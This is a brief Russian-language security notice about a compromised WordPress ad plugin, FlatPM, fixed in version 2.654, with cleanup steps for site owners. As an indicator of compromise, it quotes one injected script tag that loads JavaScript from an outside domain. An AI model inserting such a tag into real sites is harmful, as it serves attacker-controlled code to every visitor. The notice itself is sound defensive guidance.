Закрыта опасная уязвимость в плагине Flat PM
Вчера был скомпрометирован популярный плагин FlatPM для управления рекламой на сайтах под управлением WordPress.
Из-за уязвимости в плагине, которую Михаил Flat (автор плагина) поправил в версии 2.654, было взломано несколько сайтов.
Для проверки взлома нужно перейти в настройки вставки между тегами <head> и </head> и проверить нет ли там скрипта, который вы не добавляли.
Например:
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>Если это ваш случай, то настоятельно рекомендуем восстановить полный бекап сайта за вчерашний день или ранее и сразу обновить плагин до последней версии.
Также, если по какой-то причине вы этого не хотите делать или не можете, то удалите вредоносный код из раздела Header и footer, затем удалите нового пользователя из админки.
